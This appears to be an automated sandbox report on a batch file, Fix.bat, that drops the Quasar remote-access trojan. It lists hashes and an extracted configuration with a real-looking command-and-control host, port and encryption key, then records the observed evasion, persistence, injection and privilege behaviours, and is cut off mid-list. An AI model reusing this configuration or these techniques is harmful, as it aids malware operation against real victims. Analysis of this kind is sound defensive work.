Analysis
-
max time kernel
300s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12-05-2024 19:02
Static task
static1
Behavioral task
behavioral1
Sample
Fix.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Fix.bat
Resource
win10v2004-20240508-en
General
-
Target
Fix.bat
-
Size
621B
-
MD5
e235e723f57a72ef725306c3e14d4726
-
SHA1
9b2153053f8e89c300e32da5df32e9b990594aac
-
SHA256
aebe0bafeb12706e614a45f2df40518d32d502093517ce95e2d3c1bbfd64ca67
-
SHA512
0a4eda531be3904ae944d2c1c43755921cde4333a8e9d6bee6669e3de73b6c7859bb7ab3aa7a712fa2085d3fa1fb1d1ed14e5d6ed488a10bd2f6ab6ed049d25e
Malware Config
Extracted
quasar
3.1.5
RPad
even-lemon.gl.at.ply.gg:33587
$Sxr-okPqrmZ8kNVUcS4Rp0
-
encryption_key
XmcBnPuLlN1e8SHIRR1z
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BoostBot.exe family_quasar behavioral2/memory/4728-26-0x0000000000CA0000-0x0000000000D0C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process target process PID 3916 created 616 3916 powershell.EXE winlogon.exe PID 3752 created 616 3752 powershell.EXE winlogon.exe PID 1424 created 616 1424 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-powershell.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation $sxr-powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
BoostBot.exe$sxr-powershell.exeinstall.exeinstall.exepid process 4728 BoostBot.exe 1340 $sxr-powershell.exe 4944 install.exe 100 install.exe -
Loads dropped DLL 1 IoCs
Processes:
install.exepid process 2888 install.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 22 raw.githubusercontent.com 23 raw.githubusercontent.com 37 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Drops file in System32 directory 11 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEsvchost.exepowershell.EXEsvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77$sxr-powershell.exe svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEdescription pid process target process PID 3916 set thread context of 3440 3916 powershell.EXE dllhost.exe PID 3752 set thread context of 3532 3752 powershell.EXE dllhost.exe PID 1424 set thread context of 1408 1424 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exepid process 2712 schtasks.exe 4792 SCHTASKS.exe 1660 schtasks.exe 3964 SCHTASKS.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715540668" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Modifies registry class 16 IoCs
Processes:
RuntimeBroker.exeRuntimeBroker.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = 06729f049fa4da01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a1cf4e039fa4da013da1e2039fa4da013da1e2039fa4da01530400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ac5862982000363163653138323735346362303533373832643339636338393031323863626164613834616436633736343063366261306335343131363564363430376135340000b20009000400efbeac586298ac5862982e000000000000000000000000000000000000000000000000008d701e01360031006300650031003800320037003500340063006200300035003300370038003200640033003900630063003800390030003100320038006300620061006400610038003400610064003600630037003600340030006300360062006100300063003500340031003100360035006400360034003000370061003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000f555da301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36316365313832373534636230353337383264333963633839303132386362616461383461643663373634306336626130633534313136356436343037613534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f626a6979756965000000000000000096f7560095bce14897a93e3da1d528bc7d06f2e1370def119519e659512317f896f7560095bce14897a93e3da1d528bc7d06f2e1370def119519e659512317f8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0034003100320034003900300030003500350031002d0034003000360038003400370036003000360037002d0033003400390031003200310032003500330033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000003f3ccc8c000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c7ab0b85-c9c0-4e87 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = "\\\\?\\Volume{8CCC3C3F-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\61ce182754cb053782d39cc890128cbada84ad6c7640c6ba0c541165d6407a54" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3e58f70-ccb1-4d56 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEdllhost.exepowershell.EXE$sxr-powershell.exedllhost.exepid process 2124 powershell.exe 2124 powershell.exe 3916 powershell.EXE 3916 powershell.EXE 3916 powershell.EXE 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3752 powershell.EXE 1340 $sxr-powershell.exe 3440 dllhost.exe 3440 dllhost.exe 3752 powershell.EXE 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 1340 $sxr-powershell.exe 3440 dllhost.exe 3440 dllhost.exe 3752 powershell.EXE 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3440 dllhost.exe 3752 powershell.EXE 3440 dllhost.exe 3440 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe 3532 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeBoostBot.exepowershell.EXE$sxr-powershell.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 4728 BoostBot.exe Token: SeDebugPrivilege 3916 powershell.EXE Token: SeDebugPrivilege 1340 $sxr-powershell.exe Token: SeDebugPrivilege 3916 powershell.EXE Token: SeDebugPrivilege 3440 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1420 svchost.exe Token: SeIncreaseQuotaPrivilege 1420 svchost.exe Token: SeSecurityPrivilege 1420 svchost.exe Token: SeTakeOwnershipPrivilege 1420 svchost.exe Token: SeLoadDriverPrivilege 1420 svchost.exe Token: SeSystemtimePrivilege 1420 svchost.exe Token: SeBackupPrivilege 1420 svchost.exe Token: SeRestorePrivilege 1420 svchost.exe Token: SeShutdownPrivilege 1420 svchost.exe Token: SeSystemEnvironmentPrivilege 1420 svchost.exe Token: SeUndockPrivilege 1420 svchost.exe Token: SeManageVolumePrivilege 1420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1420 svchost.exe Token: SeIncreaseQuotaPrivilege 1420 svchost.exe Token: SeSecurityPrivilege 1420 svchost.exe Token: SeTakeOwnershipPrivilege 1420 svchost.exe Token: SeLoadDriverPrivilege 1420 svchost.exe Token: SeSystemtimePrivilege 1420 svchost.exe Token: SeBackupPrivilege 1420 svchost.exe Token: SeRestorePrivilege 1420 svchost.exe Token: SeShutdownPrivilege 1420 svchost.exe Token: SeSystemEnvironmentPrivilege 1420 svchost.exe Token: SeUndockPrivilege 1420 svchost.exe Token: SeManageVolumePrivilege 1420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1420 svchost.exe Token: SeIncreaseQuotaPrivilege 1420 svchost.exe Token: SeSecurityPrivilege 1420 svchost.exe Token: SeTakeOwnershipPrivilege 1420 svchost.exe Token: SeLoadDriverPrivilege 1420 svchost.exe Token: SeSystemtimePrivilege 1420 svchost.exe Token: SeBackupPrivilege 1420 svchost.exe Token: SeRestorePrivilege 1420 svchost.exe Token: SeShutdownPrivilege 1420 svchost.exe Token: SeSystemEnvironmentPrivilege 1420 svchost.exe Token: SeUndockPrivilege 1420 svchost.exe Token: SeManageVolumePrivilege 1420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1420 svchost.exe Token: SeIncreaseQuotaPrivilege 1420 svchost.exe Token: SeSecurityPrivilege 1420 svchost.exe Token: SeTakeOwnershipPrivilege 1420 svchost.exe Token: SeLoadDriverPrivilege 1420 svchost.exe Token: SeSystemtimePrivilege 1420 svchost.exe Token: SeBackupPrivilege 1420 svchost.exe Token: SeRestorePrivilege 1420 svchost.exe Token: SeShutdownPrivilege 1420 svchost.exe Token: 